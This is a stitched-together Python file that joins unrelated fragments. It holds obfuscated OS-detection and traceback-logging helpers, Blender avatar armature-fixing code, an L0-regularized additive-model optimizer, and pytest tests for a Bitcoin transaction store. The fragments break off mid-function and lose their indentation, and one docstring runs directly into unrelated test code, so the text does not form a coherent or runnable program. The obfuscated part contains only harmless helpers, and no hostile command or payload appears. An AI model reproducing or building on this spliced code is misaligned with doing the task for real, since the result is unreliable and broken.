if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
def lisp_record_traceback ( * args ) :
OOOO0O00o = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
ooo = open ( "./logs/lisp-traceback.log" , "a" )
ooo . write ( "---------- Exception occurred: {} ----------\n" . format ( OOOO0O00o ) )
try :
traceback . print_last ( file = ooo )
except :
ooo . write ( "traceback.print_last(file=fd) failed" )
if 19 - 19: OoO0O00 - Oo0Ooo . oO0o / oO0o % ooOoO0o
try :
traceback . print_last ( )
except :
print ( "traceback.print_last() failed" )
if 56 - 56: I1IiiI . O0 + Oo0Ooo
ooo . close ( )
return
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
def lisp_set_exception ( ) :
sys . excepthook = lisp_record_traceback
return
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
def lisp_is_raspbian ( ) :
if ( platform . dist ( ) [ 0 ] != "debian" ) : return ( False )
return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 5 - 5: Ii1I
if 46 - 46: IiII
if 45 - 45: ooOoO0o
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
if 17 - 17: OOooOOo / OOooOOo / I11i
if 1 - 1: i1IIi . i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
def lisp_is_ubuntu ( ) :
return ( platform . dist ( ) [ 0 ] == "Ubuntu" )
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
if 27 - 27: O0
def lisp_is_fedora ( ) :
return ( platform . dist ( ) [ 0 ] == "fedora" )
if 79 - 79: o0oOOo0O0Ooo - I11i + o0oOOo0O0Ooo . oO0o
if 28 - 28: i1IIi - iII111i
if 54 - 54: iII111i - O0 % OOooOOo
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
if 28 - 28: I11i
if 58 - 58: OoOoOO00
def lisp_is_centos ( ) :
return ( platform . dist ( ) [ 0 ] == "centos" )
if 37 - 37: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i
if 73 - 73: i11iIiiIii - IiII
if 25 - 25: OoooooooOO + IiII * I1ii11iIi11i
if 92 - 92: I1IiiI + I11i + O0 / o0oOOo0O0Ooo + I1Ii111
if 18 - 18: ooOoO0o * OoOoOO00 . iII111i / I1ii11iIi11i / i11iIiiIii
if 21 - 21: oO0o / I1ii11iIi11i + Ii1I + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + iII111i + ooOoO0o * i11iIiiIii
def lisp_is_debian ( ) :
return ( platform . dist ( ) [ 0 ] == "debian" )
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + I11i * I1Ii111 . IiII
if 52 - 52: ooOoO0o + O0 . iII111i . I1ii11iIi11i . OoO0O00
if 97 - 97: I1IiiI / iII111i
if 71 - 71: II111iiii / i1IIi . I1ii11iIi11i % OoooooooOO . OoOoOO00
if 41 - 41: i1IIi * II111iiii / OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
def lisp_is_debian_kali ( ) :
return ( platform . dist ( ) [ 0 ] == "Kali" )
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
def lisp_is_macos ( ) :
        # hips bone is not below the legs bone
# hip_bone_length = abs(hips.tail[z_cord] - hips.head[z_cord])
# hips.head[z_cord] = right_leg.head[z_cord]
# hips.tail[z_cord] = hips.head[z_cord] + hip_bone_length
# hips.head[z_cord] = right_leg.head[z_cord]
# hips.tail[z_cord] = spine.head[z_cord]
# if hips.tail[z_cord] < hips.head[z_cord]:
# hips.tail[z_cord] = hips.tail[z_cord] + 0.1
# elif spine and chest and neck and head:
# bones = [hips, spine, chest, neck, head]
# for bone in bones:
# bone_length = abs(bone.tail[z_cord] - bone.head[z_cord])
# bone.tail[x_cord] = bone.head[x_cord]
# bone.tail[y_cord] = bone.head[y_cord]
# bone.tail[z_cord] = bone.head[z_cord] + bone_length
else:
if left_leg and left_knee and right_leg and right_knee:
hips.head[x_cord] = 0
hips.tail[x_cord] = 0
hips.tail[y_cord] = hips.head[y_cord]
hips.head[z_cord] = spine.head[z_cord]
hips.tail[z_cord] = right_leg.head[z_cord]
left_leg_top = armature.data.edit_bones.new('Left leg top')
right_leg_top = armature.data.edit_bones.new('Right leg top')
left_leg_top.head = left_leg.head
left_leg_top.tail = left_leg.head
left_leg_top.tail[z_cord] = left_leg.head[z_cord] + 0.1
right_leg_top.head = right_leg.head
right_leg_top.tail = right_leg.head
right_leg_top.tail[z_cord] = right_leg.head[z_cord] + 0.1
spine.head = hips.head
# hips.head[z_cord] -= 0.0025
# spine.head[z_cord] += 0.0025
left_leg.name = "Left leg 2"
right_leg.name = "Right leg 2"
left_leg_top.name = "Left leg"
right_leg_top.name = "Right leg"
left_leg_top.parent = hips
right_leg_top.parent = hips
left_leg.parent = left_leg_top
right_leg.parent = right_leg_top
left_knee.parent = left_leg_top
right_knee.parent = right_leg_top
# # Fixing legs
# right_knee = armature.data.edit_bones.get('Right knee')
# left_knee = armature.data.edit_bones.get('Left knee')
# if right_knee and left_knee:
# # Make sure the upper legs tail are the same x/y values as the lower leg tail x/y
# right_leg.tail[x_cord] = right_leg.head[x_cord]
# left_leg.tail[x_cord] = left_knee.head[x_cord]
# right_leg.head[y_cord] = right_knee.head[y_cord]
# left_leg.head[y_cord] = left_knee.head[y_cord]
#
# # Make sure the leg bones are setup straight. (head should be same X as tail)
# left_leg.head[x_cord] = left_leg.tail[x_cord]
# right_leg.head[x_cord] = right_leg.tail[x_cord]
#
# # Make sure the left legs (head tip) have the same Y values as right leg (head tip)
# left_leg.head[y_cord] = right_leg.head[y_cord]
# Function: Reweight all eye children into the eyes
def add_eye_children(eye_bone, parent_name):
for eye in eye_bone.children:
temp_list_reweight_bones[eye.name] = parent_name
add_eye_children(eye, parent_name)
# Reweight all eye children into the eyes
for eye_name in ['Eye_L', 'Eye_R']:
if eye_name in armature.data.edit_bones:
eye = armature.data.edit_bones.get(eye_name)
add_eye_children(eye, eye.name)
# Rotate if on head and not fbx (Unreal engine model)
if 'Hips' in armature.data.edit_bones:
hips = armature.pose.bones.get('Hips')
obj = hips.id_data
matrix_final = obj.matrix_world * hips.matrix
# print(matrix_final)
# print(matrix_final[2][3])
# print(fbx)
if not fbx and matrix_final[2][3] < 0:
# print(hips.head[0], hips.head[1], hips.head[2])
# Rotation of -180 around the X-axis
rot_x_neg180 = Matrix.Rotation(-math.pi, 4, 'X')
armature.matrix_world = rot_x_neg180 * armature.matrix_world
mesh.rotation_euler = (math.radians(180), 0, 0)
# Fixes bones disappearing, prevents bones from having their tail and head at the exact same position
for bone in armature.data.edit_bones:
if round(bone.head[x_cord], 5) == round(bone.tail[x_cord], 5)\
and round(bone.head[y_cord], 5) == round(bone.tail[y_cord], 5)\
and round(bone.head[z_cord], 5) == round(bone.tail[z_cord], 5):
if bone.name == 'Hips' and full_body_tracking:
bone.tail[z_cord] -= 0.1
else:
bone.tail[z_cord] += 0.1
# Mixing the weights
tools.common.unselect_all()
tools.common.switch('OBJECT')
tools.common.select(mesh)
# for bone_name in temp_rename_bones.keys():
# bone = armature.data.bones.get(bone_name)
# if bone:
# print(bone_name)
# bone.hide = False
for bone_new, bones_old in temp_reweight_bones.items():
if '\Left' in bone_new or '\L' in bone_new:
bones = [[bone_new.replace('\Left', 'Left').replace('\left', 'left').replace('\L', 'L').replace('\l', 'l'), ''],
[bone_new.replace('\Left', 'Right').replace('\left', 'right').replace('\L', 'R').replace('\l', 'r'), '']]
else:
bones = [[bone_new, '']]
for bone_old in bones_old:
if '\Left' in bone_new or '\L' in bone_new:
bones[0][1] = bone_old.replace('\Left', 'Left').replace('\left', 'left').replace('\L', 'L').replace('\l', 'l')
bones[1][1] = bone_old.replace('\Left', 'Right').replace('\left', 'right').replace('\L', 'R').replace('\l', 'r')
else:
bones[0][1] = bone_old
for bone in bones: # bone[0] = new name, bone[1] = old name
current_step += 1
wm.progress_update(current_step)
# Search for vertex group
vg = None
for vg_tmp in mesh.vertex_groups:
if vg_tmp.name.lower() == bone[1].lower():
vg = vg_tmp
break
# Cancel if vertex group was not found
if not vg:
continue
if bone[0] == vg.name:
print('BUG: ' + bone[0] + ' tried to mix weights with itself!')
continue
# print(bone[1] + " to1 " + bone[0])
# If important vertex group is not there create it
if mesh.vertex_groups.get(bone[0]) is None:
if bone[0] in Bones.dont_delete_these_bones and bone[0] in armature.data.bones:
bpy.ops.object.vertex_group_add()
mesh.vertex_groups.active.name = bone[0]
if mesh.vertex_groups.get(bone[0]) is None:
continue
else:
continue
bone_tmp = armature.data.bones.get(vg.name)
if bone_tmp:
for child in bone_tmp.children:
if not temp_list_reparent_bones.get(child.name):
temp_list_reparent_bones[child.name] = bone[0]
# print(bone[1] + " to " + bone[0])
tools.common.mix_weights(mesh, vg.name, bone[0])
# Old mixing weights. Still important
for key, value in temp_list_reweight_bones.items():
current_step += 1
wm.progress_update(current_step)
# Search for vertex groups
vg_from = None
vg_to = None
for vg_tmp in mesh.vertex_groups:
if vg_tmp.name.lower() == key.lower():
vg_from = vg_tmp
if vg_to:
break
elif vg_tmp.name.lower() == value.lower():
vg_to = vg_tmp
if vg_from:
break
# Cancel if the vertex groups were not found
if not vg_from or not vg_to:
continue
bone_tmp = armature.data.bones.get(vg_from.name)
if bone_tmp:
for child in bone_tmp.children:
if not temp_list_reparent_bones.get(child.name):
temp_list_reparent_bones[child.name] = vg_to.name
if vg_from.name == vg_to.name:
print('BUG: ' + vg_to.name + ' tried to mix weights with itself!')
continue
# Mix the weights
# print(vg_from.name, 'into', vg_to.name)
tools.common.mix_weights(mesh, vg_from.name, vg_to.name)
tools.common.unselect_all()
tools.common.select(armature)
tools.common.switch('EDIT')
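# tools.common.mix_weights above is a Cats helper; the sketch below is only an illustration
# of what an equivalent vertex-weight merge looks like with Blender's own API (the 2.7x-era
# operator call and the assumption that the mesh object is active are not taken from this
# add-on). It is defined here for reference and never called.
def _mix_weights_sketch(mesh_obj, vg_from, vg_to):
    import bpy  # Blender's Python API, available inside Blender
    # Add a Vertex Weight Mix modifier that adds the weights of vg_from into vg_to ...
    mod = mesh_obj.modifiers.new("mix", 'VERTEX_WEIGHT_MIX')
    mod.vertex_group_a = vg_to
    mod.vertex_group_b = vg_from
    mod.mix_mode = 'ADD'
    mod.mix_set = 'B'  # only touch vertices that carry weight in group B
    # ... apply it (mesh_obj must be the active object) and drop the source group.
    bpy.ops.object.modifier_apply(modifier=mod.name)
    mesh_obj.vertex_groups.remove(mesh_obj.vertex_groups.get(vg_from))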
# Reparent all bones to be correct for unity mapping and vrc itself
for key, value in temp_list_reparent_bones.items():
# current_step += 1
# wm.progress_update(current_step)
if key in armature.data.edit_bones and value in armature.data.edit_bones:
armature.data.edit_bones.get(key).parent = armature.data.edit_bones.get(value)
# Bone constraints should be deleted
# if context.scene.remove_constraints:
tools.common.delete_bone_constraints()
# Removes unused vertex groups
tools.common.remove_unused_vertex_groups()
# Zero weight bones should be deleted
if context.scene.remove_zero_weight:
tools.common.delete_zero_weight()
# # This is code for testing
# print('LOOKING FOR BONES!')
# if 'Head' in tools.common.get_armature().pose.bones:
# print('THEY ARE THERE!')
# else:
# print('NOT FOUND!!!!!!')
# return {'FINISHED'}
# At this point, everything should be fixed and now we validate and give errors if needed
# The bone hierarchy needs to be validated
hierarchy_check_hips = check_hierarchy(False, [
['Hips', 'Spine', 'Chest', 'Neck', 'Head'],
['Hips', 'Left leg', 'Left knee', 'Left ankle'],
['Hips', 'Right leg', 'Right knee', 'Right ankle'],
['Chest', 'Left shoulder', 'Left arm', 'Left elbow', 'Left wrist'],
['Chest', 'Right shoulder', 'Right arm', 'Right elbow', 'Right wrist']
])
# Armature should be named correctly (has to be at the end because of multiple armatures)
tools.common.fix_armature_names()
# Fix shading (check for runtime error because of ci tests)
if not source_engine:
try:
bpy.ops.mmd_tools.set_shadeless_glsl_shading()
except RuntimeError:
pass
wm.progress_end()
if not hierarchy_check_hips['result']:
self.report({'ERROR'}, hierarchy_check_hips['message'])
return {'FINISHED'}
if fixed_uv_coords:
tools.common.show_error(6.2, ['The model was successfully fixed, but there were ' + str(fixed_uv_coords) + ' faulty UV coordinates.',
'This could result in broken textures and you might have to fix them manually.',
'This issue is often caused by edits in PMX editor.'])
return {'FINISHED'}
self.report({'INFO'}, 'Model successfully fixed.')
return {'FINISHED'}
def check_hierarchy(check_parenting, correct_hierarchy_array):
armature = tools.common.set_default_stage()
missing_bones = []
missing2 = ['The following bones were not found:', '']
for correct_hierarchy in correct_hierarchy_array: # For each hierarchy array
line = ' - '
for index, bone in enumerate(correct_hierarchy): # For each hierarchy bone item
if bone not in missing_bones and bone not in armature.data.bones:
missing_bones.append(bone)
if len(line) > 3:
line += ', '
line += bone
if len(line) > 3:
missing2.append(line)
if len(missing2) > 2 and not check_parenting:
missing2.append('')
missing2.append('Looks like you found a model which Cats could not fix!')
missing2.append('If this is a non modified model we would love to make it compatible.')
missing2.append('Report it to us in the forum or in our discord, links can be found in the Credits panel.')
tools.common.show_error(6.4, missing2)
return {'result': True, 'message': ''}
if check_parenting:
for correct_hierarchy in correct_hierarchy_array: # For each hierarchy array
previous = None
for index, bone in enumerate(correct_hierarchy): # For each hierarchy bone item
if index > 0:
previous = correct_hierarchy[index - 1]
if bone in armature.data.bones:
bone = armature.data.bones[bone]
# If a previous item was found
if previous is not None:
# And there is no parent, then we have a problem mkay
if bone.parent is None:
return {'result': False, 'message': bone.name + ' is not parented at all, this will cause problems!'}
# Previous needs to be the parent of the current item
if previous != bone.parent.name:
return {'result': False, 'message': bone.name + ' is not parented to ' + previous + ', this will cause problems!'}
# SparseAMsWithInteractions/src/AMsWithInteractionsL0/optimizer.py
from copy import deepcopy
from IPython.display import Math
from ipywidgets import *
import numpy as np
import scipy.sparse as sp
from scipy.special import comb
from sklearn.metrics import mean_squared_error
from tqdm import notebook
import warnings
from SparseAMsWithInteractions.src.AMsWithInteractionsL0 import utilities
def CD_Joint_ActiveSet(Ypred = None,
beta = None,
zeta = None,
active_set = None,
lam = None,
P = None,
P_interaction = None,
Y = None,
B = None,
B_interaction = None,
S = None,
S_interaction = None,
I = None,
interaction_terms = None,
r = None,
max_iter = None,
tol = 1e-4,
verbose=False,
path = None):
"""Cyclic Block Coordinate Descent over active set.
Args:
Ypred: current prediction, numpy array of shape (N, ).
beta: coefficients for main/interaction effects, 2 lists of arrays of shapes [ [(Ki+1, 1), ...], [(Kij+1, 1), ...]]
zeta: binary vector to track which main effects are in the active set, 2 bool arrays of shape [(1, d), (1, Imax)]
active_set: indices of main effects to optimize over, a numpy int array.
lam: regularization parameters [lam_1, lam_2], list of floats.
P: B^T*B + 2*N*(lam_1*S_i + eps*I) matrices for main effects, list of sparse matrices of shapes [(Ki+1, Ki+1), ...].
eps is a small epsilon for numerical stability.
P_interaction: B^T*B + 2*N*(lam_1*S_ij + eps*I) matrices for interaction effects, list of sparse matrices of shapes [(Kij+1, Kij+1), ...].
eps is a small epsilon for numerical stability.
B: B-spline transformed sparse matrices for main effects, list of sparse matrices of shapes [(N, Ki+1), ...].
B_interaction: B-spline transformed sparse matrices for interaction effects, list of sparse matrices of shapes [(N, Kij+1), ...].
S: Smoothness matrices for main effects, list of sparse matrices of shapes [(Ki+1, Ki+1), ...].
S_interaction: Smoothness matrices for interaction effects, list of sparse matrices of shapes [(Kij+1, Kij+1), ...].
I: number of possible main and interaction effects, int scalars.
Y: training target responses, a float numpy array of shape (N,).
interaction_terms: list of interaction effects to consider if only a subset need to be considered,
a 2D numpy array of shape (Imax, 2).
max_iter: maximum number of cyclic BCD passes over the active set, int scalar.
tol: relative loss termination criterion for stopping, a float scalar.
verbose: for printing optimization steps, bool scalar.
path: for logging, str.
Returns:
Ypred: Updated prediction, numpy array of shape (N, ).
beta: Updated coefficients for main effects, list of arrays of shapes [(Ki+1, 1), ...].
zeta: Updated binary vector to track which main effects are in the active set, a bool array of shape (1, d)
"""
N = Y.shape[0]
delta = beta[1]
beta = beta[0]
alpha = zeta[1]
zeta = zeta[0]
active_interaction_set = active_set[1]
active_set = active_set[0]
Bspam = B
Bspam_interaction = B_interaction
Pspam = P
Pspam_interaction = P_interaction
d = I[0]
dinteraction = I[1]
debugging_mode = False
eps = 1e-8
J = 0.5*mean_squared_error(Y, Ypred)+\
lam[0]*sum([(np.transpose(beta[k])).dot(S[k].dot(beta[k]))[0,0] for k in active_set])+\
lam[0]*sum([(np.transpose(delta[k])).dot(S_interaction[k].dot(delta[k]))[0,0] for k in active_interaction_set])+\
eps*sum([np.dot(beta[k][:,0],beta[k][:,0]) for k in active_set])+\
eps*sum([np.dot(delta[k][:,0],delta[k][:,0]) for k in active_interaction_set])+\
lam[1]*(np.count_nonzero(zeta[0,:]))+\
r*lam[1]*(np.count_nonzero(alpha[0,:]))
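# Written out, the objective J computed just above is (term by term, matching the code):
#   J = 0.5 * MSE(Y, Ypred)
#       + lam_1 * sum_{k in active_set} beta_k^T S_k beta_k
#       + lam_1 * sum_{kl in active_interaction_set} delta_kl^T S_kl delta_kl
#       + eps * (sum_k ||beta_k||_2^2 + sum_kl ||delta_kl||_2^2)   (small ridge term for stability)
#       + lam_2 * ||zeta||_0 + r * lam_2 * ||alpha||_0             (L0 penalties on selected effects)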
J_initial = deepcopy(J)
active_set_update = np.array([x for x in active_set if x not in np.where(zeta[0,:] == 1)[0]])
active_interaction_set_update = np.array([x for x in active_interaction_set if x not in np.where(alpha[0,:] == 1)[0]])
if verbose == True:
display(Math(r'Input~Obj: {:.0f},'.format(J)+'\sum_{j \in S^c} z_j: '+'{} \leq {}.'.format(np.count_nonzero(zeta[0,:]), len(active_set))+'\sum_{ij \in S^c} z_{ij}: '+'{} \leq {}.'.format(np.count_nonzero(alpha[0,:]),len(active_interaction_set))))
for it in range(max_iter):
for j in active_set:
if zeta[0,j]==True:
Ypred -= Bspam[j].dot(beta[j])
res = Y-Ypred
beta[j], zeta[:,j] = utilities.solve(B = Bspam[j], P = Pspam[j], y = res, beta = beta[j], S=S[j], lam = [lam[0], lam[1]])
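# utilities.solve presumably performs the per-block L0 step: solve the smoothness-penalized
# least-squares system for beta_j against the partial residual, then keep the block only if
# doing so lowers the objective by more than the L0 charge lam[1]; zeta[:, j] records that
# keep/drop decision. (Inferred from the call signature, not verified against utilities.py.)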
if zeta[0,j]==True:
Ypred += Bspam[j].dot(beta[j])
for j in active_interaction_set:
if alpha[0,j]==True:
Ypred -= Bspam_interaction[j].dot(delta[j])
res = Y-Ypred
delta[j], alpha[:,j] = utilities.solve(B = Bspam_interaction[j], P = Pspam_interaction[j], y = res, beta = delta[j], S=S_interaction[j], lam = [lam[0], r*lam[1]])
if alpha[0,j]==True:
Ypred += Bspam_interaction[j].dot(delta[j])
J_prev = deepcopy(J)
J = 0.5*mean_squared_error(Y, Ypred)+\
lam[0]*sum([(np.transpose(beta[k])).dot(S[k].dot(beta[k]))[0,0] for k in active_set])+\
lam[0]*sum([(np.transpose(delta[k])).dot(S_interaction[k].dot(delta[k]))[0,0] for k in active_interaction_set])+\
eps*sum([np.dot(beta[k][:,0],beta[k][:,0]) for k in active_set])+\
eps*sum([np.dot(delta[k][:,0],delta[k][:,0]) for k in active_interaction_set])+\
lam[1]*(np.count_nonzero(zeta[0,:]))+\
r*lam[1]*(np.count_nonzero(alpha[0,:]))
if J>10*J_initial:
beta = [np.zeros(bb.shape,dtype=float) for bb in beta]
delta = [np.zeros(dd.shape,dtype=float) for dd in delta]
Ypred = np.mean(Y)*np.ones(Y.shape,dtype=float)
J_initial = 0.5*mean_squared_error(Y, Ypred)+\
lam[0]*sum([(np.transpose(beta[k])).dot(S[k].dot(beta[k]))[0,0] for k in active_set])+\
lam[0]*sum([(np.transpose(delta[k])).dot(S_interaction[k].dot(delta[k]))[0,0] for k in active_interaction_set])+\
eps*sum([np.dot(beta[k][:,0],beta[k][:,0]) for k in active_set])+\
eps*sum([np.dot(delta[k][:,0],delta[k][:,0]) for k in active_interaction_set])+\
lam[1]*(np.count_nonzero(zeta[0,:]))+\
r*lam[1]*(np.count_nonzero(alpha[0,:]))
debugging_mode = True
# for i in active_set_update:
# Pspam[i] = sp.linalg.splu((Bspam[i].transpose()).dot(Bspam[i])+2*N*(lam[0]*S[i]+eps*sp.csr_matrix(np.identity(Bspam[i].shape[1]))))
# for i in active_interaction_set_update:
# Pspam_interaction[i] = sp.linalg.splu((Bspam_interaction[i].transpose()).dot(Bspam_interaction[i])+2*N*(lam[0]*S_interaction[i]+eps*sp.csr_matrix(np.identity(Bspam_interaction[i].shape[1]))))
continue
J_del = J-J_prev
if debugging_mode == True:
print('Debugging, lambda_1:{:.6f}, lambda_2:{:.6f}, J: {:.5f}, |Delta J/J|: {:.4f}, '.format(lam[0], lam[1], J, np.absolute(J_del/J)))
if np.absolute(J_del/J)<tol:
break
if verbose == True:
display(Math(r'Output~Obj: {:.0f}, |\Delta J/J|: {:.4f}, '.format(J, np.absolute(J_del/J))+'\sum_{j \in S^c} z_j: '+'{} \leq {}.'.format(np.count_nonzero(zeta[0,:]), len(active_set))+'\sum_{ij \in S^c} z_{ij}: '+'{} \leq {}.'.format(np.count_nonzero(alpha[0,:]),len(active_interaction_set))))
if(it == max_iter-1):
with open(path+'/Warning.txt', "a") as f:
f.write('Warning: CD over active set did not converge within the chosen max_iter!')
return Ypred, beta, zeta, delta, alpha
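# CD_Joint below presumably follows the usual active-set pattern: run CD_Joint_ActiveSet
# (passed in as CD_J_AS) to convergence on the current active set, then sweep the full set
# of candidate effects once to see whether any excluded effect should enter, and repeat
# until nothing is added or a MaxSuppSize_* limit is reached. (Inferred from the argument
# names full_set and MaxSuppSize_*.)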
def CD_Joint(CD_J_AS = None,
Ypred = None,
beta = None,
zeta = None,
active_set = None,
lam = None,
P = None,
P_interaction = None,
Y = None,
B = None,
B_interaction = None,
S = None,
S_interaction = None,
I = None,
interaction_terms = None,
r = None,
max_iter = None,
tol = 1e-4,
full_set = None,
MaxSuppSize_main = None,
MaxSuppSize_interaction = None,
verbose = False,
path = None):
"""Cyclic Block Coordinate Descent over the full set of main/interaction effects.
Args:
CD_J_AS: a callable function that optimizes over a reduced set of main effects, callable.
Ypred: numpy array of shape (N, ).
beta: coefficients for main/interaction effects, 2 lists of arrays of shapes [ [(Ki+1, 1), ...], [(Kij+1, 1), ...]]
zeta: binary vector to track which main effects are in the active set, 2 bool arrays of shape [(1, d), (1, Imax)]
active_set: indices of main effects to optimize over, a numpy int array.
lam: regularization parameters [lam_1, lam_2], list of floats.
P: B^T*B + 2*N*(lam_1*S_i + eps*I) matrices for main effects, list of sparse matrices of shapes [(Ki+1, Ki+1), ...].
eps is a small epsilon for numerical stability.
P_interaction: B^T*B + 2*N*(lam_1*S_ij + eps*I) matrices for interaction effects, list of sparse matrices of shapes [(Kij+1, Kij+1), ...].
eps is a small epsilon for numerical stability.
Y: training target responses, a float numpy array of shape (N,).
B: B-spline transformed sparse matrices for main effects, list of sparse matrices of shapes [(N, Ki+1), ...].
B_interaction: B-spline transformed sparse matrices for interaction effects, list of sparse matrices of shapes [(N, Kij+1), ...].
S: Smoothness matrices for main effects, list of sparse matrices of shapes [(Ki+1, Ki+1), ...].
S_interaction: Smoothness matrices for interaction effects, list of sparse matrices of shapes [(Kij+1, Kij+1), ...].
I: number of possible main/interaction effects, int scalars.
interaction_terms: list of interaction effects to consider if only a subset need to be considered,
a 2D numpy array of shape (Imax, 2).
r: relative scaling factor for the L0 penalty between main and interaction effects.
We consider r=1.0 (corresponds to the alpha symbol in the paper), float scalar.
max_iter: maximum number of cyclic BCD passes over the active set, int scalar.
tol: relative loss termination criterion for stopping, a float scalar.
full_set: indices of all main effects, a numpy int array.
main_terms: list of main effects to consider if only a subset need to be considered,
not supported yet.
MaxSuppSize_main: stop the L0 regularization path if the active set of main effects grows larger than MaxSuppSize_main
and move on to the next smoothing lambda setting, int scalar.
MaxSuppSize_interaction: stop the L0 regularization path if the active set of interaction effects grows larger than MaxSuppSize_interaction
and move on to the next smoothing lambda setting, int scalar.
verbose: for printing optimization steps, bool scalar.
path: for logging, str.
Returns:
Ypred: Updated prediction, numpy array of shape (N, ).
beta: Updated coefficients for main effects, list of arrays of shapes [(Ki+1, 1), ...].
zeta: Updated binary vector to track which main effects are in the active set, a bool array of shape (1, d).
completion_callback=writer.get_callback())
assert writer.succeeded()
# Ensure that an unset bytedata flag requires bytedata to not be included.
with pytest.raises(AssertionError):
self.store.update([(tx_hash, tx_data, tx_bytes, TxFlags.Unset)])
@pytest.mark.timeout(8)
def test_update__entry_with_magic_bytedata_and_set_flag(self):
tx_bytes = os.urandom(10)
tx_hash = bitcoinx.double_sha256(tx_bytes)
tx_data = TxData(height=None, fee=2, position=None, date_added=1, date_updated=1)
row = (tx_hash, tx_data, tx_bytes, TxFlags.HasByteData, None)
with SynchronousWriter() as writer:
self.store.create([ row ], completion_callback=writer.get_callback())
assert writer.succeeded()
# Ensure that the magic bytedata requires a set bytedata flag.
with pytest.raises(AssertionError):
self.store.update([(tx_hash, tx_data, MAGIC_UNTOUCHED_BYTEDATA, TxFlags.Unset)])
@pytest.mark.timeout(8)
def test_update__with_valid_magic_bytedata(self):
tx_bytes = os.urandom(10)
tx_hash = bitcoinx.double_sha256(tx_bytes)
tx_data = TxData(height=None, fee=2, position=None, date_added=1, date_updated=1)
row = (tx_hash, tx_data, tx_bytes, TxFlags.HasByteData, None)
with SynchronousWriter() as writer:
self.store.create([ row ], completion_callback=writer.get_callback())
assert writer.succeeded()
# Ensure that the magic bytedata value is accepted when the bytedata flag is set and the stored bytedata is preserved.
with SynchronousWriter() as writer:
self.store.update([(tx_hash, tx_data, MAGIC_UNTOUCHED_BYTEDATA, TxFlags.HasByteData)],
completion_callback=writer.get_callback())
assert writer.succeeded()
rows = self.store.read()
assert 1 == len(rows)
get_tx_hash, bytedata_get, flags_get, metadata_get = rows[0]
assert tx_bytes == bytedata_get
assert flags_get & TxFlags.HasByteData != 0
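# In other words, passing MAGIC_UNTOUCHED_BYTEDATA with a set HasByteData flag updates the
# metadata while leaving the stored bytedata untouched, which is what the read-back verifies.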
@pytest.mark.timeout(8)
def test_update_flags(self):
bytedata = os.urandom(10)
tx_hash = bitcoinx.double_sha256(bytedata)
metadata = TxData(height=1, fee=2, position=None, date_added=1, date_updated=1)
with SynchronousWriter() as writer:
self.store.create([ (tx_hash, metadata, bytedata, TxFlags.Unset, None) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Verify the field flags are assigned correctly on the add.
expected_flags = TxFlags.HasByteData | TxFlags.HasFee | TxFlags.HasHeight
_tx_hash, flags, _metadata = self.store.read_metadata(tx_hashes=[tx_hash])[0]
assert expected_flags == flags, f"expected {expected_flags!r}, got {TxFlags.to_repr(flags)}"
flags = TxFlags.StateReceived
mask = TxFlags.METADATA_FIELD_MASK | TxFlags.HasByteData | TxFlags.HasProofData
date_updated = 1
with SynchronousWriter() as writer:
self.store.update_flags([ (tx_hash, flags, mask, date_updated) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Verify the state flag is correctly added via the mask.
_tx_hash, flags_get, _metadata = self.store.read_metadata(tx_hashes=[tx_hash])[0]
expected_flags |= TxFlags.StateReceived
assert expected_flags == flags_get, \
f"{TxFlags.to_repr(expected_flags)} != {TxFlags.to_repr(flags_get)}"
flags = TxFlags.StateReceived
mask = TxFlags.Unset
date_updated = 1
with SynchronousWriter() as writer:
self.store.update_flags([ (tx_hash, flags, mask, date_updated) ],
completion_callback=writer.get_callback())
assert writer.succeeded()
# Verify the state flag is correctly set via the mask.
_tx_hash, flags, _metadata = self.store.read_metadata(tx_hashes=[tx_hash])[0]
assert TxFlags.StateReceived == flags
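# Both updates are consistent with update_flags computing the new value as
# (current_flags & mask) | flags: the first call keeps the field flags selected by the mask
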